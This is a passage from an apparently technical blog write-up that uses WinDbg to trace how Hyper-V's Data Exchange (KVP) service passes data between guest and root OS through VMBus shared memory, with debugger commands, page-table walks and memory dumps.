<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!ed 2d5bb000 aaaaaaaa</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!db 2d5bb000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#2d5bb000 aa aa aa aa 10 19 00</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in the root OS you can see the page content, of the pfn returned function of the driver vid.sys:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!db 1367bb000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1367bb000 aa aa aa aa 10 19</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As you can see that the values match, so it's really the same physical memory area, which guest and the root OS uses.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Recall that in the previous stages we define that when the feature Data Exchange is activated and it creates a port of the type HvPortTypeEvent with TargetSint = 5. Accordingly all operations with this port in the root OS will handle by KiVmbusInterrupt1, from which it calls vmbusr!XPartEnlightenedIsr, which calls KeInsertQueueDpc with the DPC, containing:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt _KDPC @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PSHED!_KDPC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 TargetInfoAsUlong : 0x113</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Type : 0x13 ''</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x001 Importance : 0x1 ''</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x002 Number : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 DpcListEntry : _SINGLE_LIST_ENTRY</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 ProcessorHistory : 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x018 DeferredRoutine : 0xfffff800`08003de0 void </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmbusr!ParentRingInterruptDpc</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x020 DeferredContext : 0xfffff800`080130e0 Void (</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartLibContextStatic</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x028 SystemArgument1 : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x030 SystemArgument2 : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x038 DpcData : (null)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentRingInterruptDpc calls vmbusr!PkGetReceiveBuffer:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>k</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`fcc1ea38 fffff800`6cdc440c vmbusr!PkGetReceiveBuffer+0x2c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`fcc1ea40 fffff800`6cdc41a7 vmbusr!PipeTryReadSingle+0x3c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`fcc1eaa0 fffff800`6cdc4037 vmbusr!PipeProcessDeferredReadWrite+0xe7</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`fcc1eaf0 fffff800`6c96535e vmbusr!PipeEvtChannelSignalArrived+0x63</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`fcc1eb30 fffff800`6cdc4e3d vmbkmclr!KmclpVmbusManualIsr+0x16</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`fcc1eb60 fffff800`fb2d31e0 vmbusr!ParentRingInterruptDpc+0x5d</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Put a breakpoint on the function vmbusr!PkGetReceiveBuffer and run our powershell script. The breakpoint will trigger and you will see that the function is passed with a structure (a pointer to the rcx) in rcx +18 is a pointer to the memory block:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>? poi(@rcx+18)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Evaluate expression: -52770386006016 = ffffd001`6fe33000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!pte ffffd001`6fe33000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VA ffffd0016fe33000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PXE at FFFFF6FB7DBEDD00 PPE at FFFFF6FB7DBA0028 PDE at FFFFF6FB74005BF8 PTE at FFFFF6E800B7F198</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">contains 0000000000225863 contains 00000000003B7863 contains 000000010FB12863 contains 80000001367BB963</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pfn 225 ---DA--KWEV pfn 3b7 ---DA--KWEV pfn 10fb12 ---DA--KWEV pfn </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1367bb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> -G-DA--KW-V</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r cr3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cr3=00000000001ab000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!vtop 1ab000 ffffd0016fe33000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: Virt ffffd001`6fe33000, pagedir 1ab000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: PML4E 1abd00</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: PDPE 225028</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: PDE 3b7bf8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: PTE 00000001`0fb12198</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: Mapped phys 00000001`367bb000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Virtual address ffffd0016fe33000 translates to physical address </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1367bb000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If you view this memory area the guest OS options are visible.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">dc ffffd0016fe33000 L1000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………………………</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6fe35b30 0065004e 00770074 0072006f 0041006b N.e.t.w.o.r.k.A.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6fe35b40 00640064 00650072 00730073 00500049 d.d.r.e.s.s.I.P.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6fe35b50 00340076 00000000 00000000 00000000 v.4.............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………………………</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6fe35d20 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6fe35d30 00300031 0030002e 0030002e 0033002e 1.0...0...0...3.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6fe35d40 00000000 00000000 00000000 00000000 ................</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!pte ffffd001`6fe35b30</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VA ffffd0016fe35b30</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PXE at FFFFF6FB7DBEDD00 PPE at FFFFF6FB7DBA0028 PDE at FFFFF6FB74005BF8 PTE at FFFFF6E800B7F1A8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">contains 0000000000225863 contains 00000000003B7863 contains 000000010FB12863 contains 80000001367BD963</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pfn 225 ---DA--KWEV pfn 3b7 ---DA--KWEV pfn 10fb12 ---DA--KWEV pfn </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1367bd </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-G-DA--KW-V</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pfn </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1367bd </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">– is a pfn 3-th page of the converted MDL.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also the same function in rdx is a pointer that contains the offset of the starting address shared with the guest OS pages (in the example it is 4448h) that you want to read:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!PkGetReceiveBuffer+0x4e:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov r8,r10 (in r10d was previously loaded displacement of rdx)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">add r8,qword ptr [rcx+20h] – the rcx+20 contains a pointer to one of the guest OS pages</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!pte @r8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VA ffffd0016ff22448</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PXE at FFFFF6FB7DBEDD00 PPE at FFFFF6FB7DBA0028 PDE at FFFFF6FB74005BF8 PTE at FFFFF6E800B7F910</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">contains 0000000000225863 contains 00000000003B7863 contains 000000010FB12863 contains 80000001367C0963</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pfn 225 ---DA--KWEV pfn 3b7 ---DA--KWEV pfn 10fb12 ---DA--KWEV pfn </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1367c0</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> -G-DA--KW-V</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If you set a breakpoint on the instruction </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">add r8,qword ptr [rcx+20h]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> then follow through several iterations in r8 you can see:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @r8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d10 00020006 00000148 00000000 00000000 ....H...........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d20 00000001 00000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">a28</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000003 00050002 ....(........... - Transmission Unit</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d30 0a140000 00000000 00000515 00000103 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d40 00000004 00000001 00000016 0000001a ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d50</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0076004b 00440050 00740061 004b0061 K.v.P.D.a.t.a.K.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
